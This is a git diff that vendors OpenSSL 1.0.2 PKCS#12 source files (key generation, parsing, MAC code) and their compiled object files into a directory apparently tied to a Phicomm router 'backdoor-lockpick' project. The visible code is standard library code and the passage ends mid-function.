+    v = EVP_MD_block_size(md_type);
+    u = EVP_MD_size(md_type);
+    if (u < 0)
+        return 0;
+    D = OPENSSL_malloc(v);
+    Ai = OPENSSL_malloc(u);
+    B = OPENSSL_malloc(v + 1);
+    Slen = v * ((saltlen + v - 1) / v);
+    if (passlen)
+        Plen = v * ((passlen + v - 1) / v);
+    else
+        Plen = 0;
+    Ilen = Slen + Plen;
+    I = OPENSSL_malloc(Ilen);
+    Ij = BN_new();
+    Bpl1 = BN_new();
+    if (!D || !Ai || !B || !I || !Ij || !Bpl1)
+        goto err;
+    for (i = 0; i < v; i++)
+        D[i] = id;
+    p = I;
+    for (i = 0; i < Slen; i++)
+        *p++ = salt[i % saltlen];
+    for (i = 0; i < Plen; i++)
+        *p++ = pass[i % passlen];
+    for (;;) {
+        if (!EVP_DigestInit_ex(&ctx, md_type, NULL)
+            || !EVP_DigestUpdate(&ctx, D, v)
+            || !EVP_DigestUpdate(&ctx, I, Ilen)
+            || !EVP_DigestFinal_ex(&ctx, Ai, NULL))
+            goto err;
+        for (j = 1; j < iter; j++) {
+            if (!EVP_DigestInit_ex(&ctx, md_type, NULL)
+                || !EVP_DigestUpdate(&ctx, Ai, u)
+                || !EVP_DigestFinal_ex(&ctx, Ai, NULL))
+                goto err;
+        }
+        memcpy(out, Ai, min(n, u));
+        if (u >= n) {
+#ifdef DEBUG_KEYGEN
+            fprintf(stderr, "Output KEY (length %d)\n", tmpn);
+            h__dump(tmpout, tmpn);
+#endif
+            ret = 1;
+            goto end;
+        }
+        n -= u;
+        out += u;
+        for (j = 0; j < v; j++)
+            B[j] = Ai[j % u];
+        /* Work out B + 1 first then can use B as tmp space */
+        if (!BN_bin2bn(B, v, Bpl1))
+            goto err;
+        if (!BN_add_word(Bpl1, 1))
+            goto err;
+        for (j = 0; j < Ilen; j += v) {
+            if (!BN_bin2bn(I + j, v, Ij))
+                goto err;
+            if (!BN_add(Ij, Ij, Bpl1))
+                goto err;
+            if (!BN_bn2bin(Ij, B))
+                goto err;
+            Ijlen = BN_num_bytes(Ij);
+            /* If more than 2^(v*8) - 1 cut off MSB */
+            if (Ijlen > v) {
+                if (!BN_bn2bin(Ij, B))
+                    goto err;
+                memcpy(I + j, B + 1, v);
+#ifndef PKCS12_BROKEN_KEYGEN
+                /* If less than v bytes pad with zeroes */
+            } else if (Ijlen < v) {
+                memset(I + j, 0, v - Ijlen);
+                if (!BN_bn2bin(Ij, I + j + v - Ijlen))
+                    goto err;
+#endif
+            } else if (!BN_bn2bin(Ij, I + j))
+                goto err;
+        }
+    }
+
+ err:
+    PKCS12err(PKCS12_F_PKCS12_KEY_GEN_UNI, ERR_R_MALLOC_FAILURE);
+
+ end:
+    OPENSSL_free(Ai);
+    OPENSSL_free(B);
+    OPENSSL_free(D);
+    OPENSSL_free(I);
+    BN_free(Ij);
+    BN_free(Bpl1);
+    EVP_MD_CTX_cleanup(&ctx);
+    return ret;
+}
+
+#ifdef DEBUG_KEYGEN
+void h__dump(unsigned char *p, int len)
+{
+    for (; len--; p++)
+        fprintf(stderr, "%02X", *p);
+    fprintf(stderr, "\n");
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_key.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_key.o
new file mode 100644
index 0000000000000000000000000000000000000000..69c7dfd8db7b399ad7df5d0c482c88914db135b9
GIT binary patch
literal 5024
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_kiss.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_kiss.c
new file mode 100644
index 0000000..ee476c3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_kiss.c
@@ -0,0 +1,297 @@
+/* p12_kiss.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/pkcs12.h>
+
+/* Simplified PKCS#12 routines */
+
+static int parse_pk12(PKCS12 *p12, const char *pass, int passlen,
+                      EVP_PKEY **pkey, STACK_OF(X509) *ocerts);
+
+static int parse_bags(STACK_OF(PKCS12_SAFEBAG) *bags, const char *pass,
+                      int passlen, EVP_PKEY **pkey, STACK_OF(X509) *ocerts);
+
+static int parse_bag(PKCS12_SAFEBAG *bag, const char *pass, int passlen,
+                     EVP_PKEY **pkey, STACK_OF(X509) *ocerts);
+
+/*
+ * Parse and decrypt a PKCS#12 structure returning user key, user cert and
+ * other (CA) certs. Note either ca should be NULL, *ca should be NULL, or it
+ * should point to a valid STACK structure. pkey and cert can be passed
+ * unitialised.
+ */
+
+int PKCS12_parse(PKCS12 *p12, const char *pass, EVP_PKEY **pkey, X509 **cert,
+                 STACK_OF(X509) **ca)
+{
+    STACK_OF(X509) *ocerts = NULL;
+    X509 *x = NULL;
+    /* Check for NULL PKCS12 structure */
+
+    if (!p12) {
+        PKCS12err(PKCS12_F_PKCS12_PARSE,
+                  PKCS12_R_INVALID_NULL_PKCS12_POINTER);
+        return 0;
+    }
+
+    if (pkey)
+        *pkey = NULL;
+    if (cert)
+        *cert = NULL;
+
+    /* Check the mac */
+
+    /*
+     * If password is zero length or NULL then try verifying both cases to
+     * determine which password is correct. The reason for this is that under
+     * PKCS#12 password based encryption no password and a zero length
+     * password are two different things...
+     */
+
+    if (!pass || !*pass) {
+        if (PKCS12_verify_mac(p12, NULL, 0))
+            pass = NULL;
+        else if (PKCS12_verify_mac(p12, "", 0))
+            pass = "";
+        else {
+            PKCS12err(PKCS12_F_PKCS12_PARSE, PKCS12_R_MAC_VERIFY_FAILURE);
+            goto err;
+        }
+    } else if (!PKCS12_verify_mac(p12, pass, -1)) {
+        PKCS12err(PKCS12_F_PKCS12_PARSE, PKCS12_R_MAC_VERIFY_FAILURE);
+        goto err;
+    }
+
+    /* Allocate stack for other certificates */
+    ocerts = sk_X509_new_null();
+
+    if (!ocerts) {
+        PKCS12err(PKCS12_F_PKCS12_PARSE, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+
+    if (!parse_pk12(p12, pass, -1, pkey, ocerts)) {
+        PKCS12err(PKCS12_F_PKCS12_PARSE, PKCS12_R_PARSE_ERROR);
+        goto err;
+    }
+
+    while ((x = sk_X509_pop(ocerts))) {
+        if (pkey && *pkey && cert && !*cert) {
+            if (X509_check_private_key(x, *pkey)) {
+                *cert = x;
+                x = NULL;
+            }
+        }
+
+        if (ca && x) {
+            if (!*ca)
+                *ca = sk_X509_new_null();
+            if (!*ca)
+                goto err;
+            if (!sk_X509_push(*ca, x))
+                goto err;
+            x = NULL;
+        }
+        if (x)
+            X509_free(x);
+    }
+
+    if (ocerts)
+        sk_X509_pop_free(ocerts, X509_free);
+
+    return 1;
+
+ err:
+
+    if (pkey && *pkey)
+        EVP_PKEY_free(*pkey);
+    if (cert && *cert)
+        X509_free(*cert);
+    if (x)
+        X509_free(x);
+    if (ocerts)
+        sk_X509_pop_free(ocerts, X509_free);
+    return 0;
+
+}
+
+/* Parse the outer PKCS#12 structure */
+
+static int parse_pk12(PKCS12 *p12, const char *pass, int passlen,
+                      EVP_PKEY **pkey, STACK_OF(X509) *ocerts)
+{
+    STACK_OF(PKCS7) *asafes;
+    STACK_OF(PKCS12_SAFEBAG) *bags;
+    int i, bagnid;
+    PKCS7 *p7;
+
+    if (!(asafes = PKCS12_unpack_authsafes(p12)))
+        return 0;
+    for (i = 0; i < sk_PKCS7_num(asafes); i++) {
+        p7 = sk_PKCS7_value(asafes, i);
+        bagnid = OBJ_obj2nid(p7->type);
+        if (bagnid == NID_pkcs7_data) {
+            bags = PKCS12_unpack_p7data(p7);
+        } else if (bagnid == NID_pkcs7_encrypted) {
+            bags = PKCS12_unpack_p7encdata(p7, pass, passlen);
+        } else
+            continue;
+        if (!bags) {
+            sk_PKCS7_pop_free(asafes, PKCS7_free);
+            return 0;
+        }
+        if (!parse_bags(bags, pass, passlen, pkey, ocerts)) {
+            sk_PKCS12_SAFEBAG_pop_free(bags, PKCS12_SAFEBAG_free);
+            sk_PKCS7_pop_free(asafes, PKCS7_free);
+            return 0;
+        }
+        sk_PKCS12_SAFEBAG_pop_free(bags, PKCS12_SAFEBAG_free);
+    }
+    sk_PKCS7_pop_free(asafes, PKCS7_free);
+    return 1;
+}
+
+static int parse_bags(STACK_OF(PKCS12_SAFEBAG) *bags, const char *pass,
+                      int passlen, EVP_PKEY **pkey, STACK_OF(X509) *ocerts)
+{
+    int i;
+    for (i = 0; i < sk_PKCS12_SAFEBAG_num(bags); i++) {
+        if (!parse_bag(sk_PKCS12_SAFEBAG_value(bags, i),
+                       pass, passlen, pkey, ocerts))
+            return 0;
+    }
+    return 1;
+}
+
+static int parse_bag(PKCS12_SAFEBAG *bag, const char *pass, int passlen,
+                     EVP_PKEY **pkey, STACK_OF(X509) *ocerts)
+{
+    PKCS8_PRIV_KEY_INFO *p8;
+    X509 *x509;
+    ASN1_TYPE *attrib;
+    ASN1_BMPSTRING *fname = NULL;
+    ASN1_OCTET_STRING *lkid = NULL;
+
+    if ((attrib = PKCS12_get_attr(bag, NID_friendlyName)))
+        fname = attrib->value.bmpstring;
+
+    if ((attrib = PKCS12_get_attr(bag, NID_localKeyID)))
+        lkid = attrib->value.octet_string;
+
+    switch (M_PKCS12_bag_type(bag)) {
+    case NID_keyBag:
+        if (!pkey || *pkey)
+            return 1;
+        if (!(*pkey = EVP_PKCS82PKEY(bag->value.keybag)))
+            return 0;
+        break;
+
+    case NID_pkcs8ShroudedKeyBag:
+        if (!pkey || *pkey)
+            return 1;
+        if (!(p8 = PKCS12_decrypt_skey(bag, pass, passlen)))
+            return 0;
+        *pkey = EVP_PKCS82PKEY(p8);
+        PKCS8_PRIV_KEY_INFO_free(p8);
+        if (!(*pkey))
+            return 0;
+        break;
+
+    case NID_certBag:
+        if (M_PKCS12_cert_bag_type(bag) != NID_x509Certificate)
+            return 1;
+        if (!(x509 = PKCS12_certbag2x509(bag)))
+            return 0;
+        if (lkid && !X509_keyid_set1(x509, lkid->data, lkid->length)) {
+            X509_free(x509);
+            return 0;
+        }
+        if (fname) {
+            int len, r;
+            unsigned char *data;
+            len = ASN1_STRING_to_UTF8(&data, fname);
+            if (len >= 0) {
+                r = X509_alias_set1(x509, data, len);
+                OPENSSL_free(data);
+                if (!r) {
+                    X509_free(x509);
+                    return 0;
+                }
+            }
+        }
+
+        if (!sk_X509_push(ocerts, x509)) {
+            X509_free(x509);
+            return 0;
+        }
+
+        break;
+
+    case NID_safeContentsBag:
+        return parse_bags(bag->value.safes, pass, passlen, pkey, ocerts);
+        break;
+
+    default:
+        return 1;
+        break;
+    }
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_kiss.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_kiss.o
new file mode 100644
index 0000000000000000000000000000000000000000..81b6b2aab5378f4250fc62433992c2153716b79e
GIT binary patch
literal 5384
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_mutl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_mutl.c
new file mode 100644
index 0000000..256b210
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_mutl.c
@@ -0,0 +1,194 @@
+/* p12_mutl.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef OPENSSL_NO_HMAC
+# include <stdio.h>
+# include "cryptlib.h"
+# include <openssl/hmac.h>
+# include <openssl/rand.h>
+# include <openssl/pkcs12.h>
+
+/* Generate a MAC */
+int PKCS12_gen_mac(PKCS12 *p12, const char *pass, int passlen,
+                   unsigned char *mac, unsigned int *maclen)
+{
+    const EVP_MD *md_type;
+    HMAC_CTX hmac;
+    unsigned char key[EVP_MAX_MD_SIZE], *salt;
+    int saltlen, iter;
+    int md_size;
+
+    if (!PKCS7_type_is_data(p12->authsafes)) {
+        PKCS12err(PKCS12_F_PKCS12_GEN_MAC, PKCS12_R_CONTENT_TYPE_NOT_DATA);
+        return 0;
+    }
+
+    salt = p12->mac->salt->data;
+    saltlen = p12->mac->salt->length;
+    if (!p12->mac->iter)
+        iter = 1;
+    else
+        iter = ASN1_INTEGER_get(p12->mac->iter);
+    if (!(md_type = EVP_get_digestbyobj(p12->mac->dinfo->algor->algorithm))) {
+        PKCS12err(PKCS12_F_PKCS12_GEN_MAC, PKCS12_R_UNKNOWN_DIGEST_ALGORITHM);
+        return 0;
+    }
+    md_size = EVP_MD_size(md_type);
+    if (md_size < 0)
+        return 0;
+    if (!PKCS12_key_gen(pass, passlen, salt, saltlen, PKCS12_MAC_ID, iter,
+                        md_size, key, md_type)) {
+        PKCS12err(PKCS12_F_PKCS12_GEN_MAC, PKCS12_R_KEY_GEN_ERROR);
+        return 0;
+    }
+    HMAC_CTX_init(&hmac);
+    if (!HMAC_Init_ex(&hmac, key, md_size, md_type, NULL)
+        || !HMAC_Update(&hmac, p12->authsafes->d.data->data,
+                        p12->authsafes->d.data->length)
+        || !HMAC_Final(&hmac, mac, maclen)) {
+        HMAC_CTX_cleanup(&hmac);
+        return 0;
+    }
+    HMAC_CTX_cleanup(&hmac);
+    return 1;
+}
+
+/* Verify the mac */
+int PKCS12_verify_mac(PKCS12 *p12, const char *pass, int passlen)
+{
+    unsigned char mac[EVP_MAX_MD_SIZE];
+    unsigned int maclen;
+    if (p12->mac == NULL) {
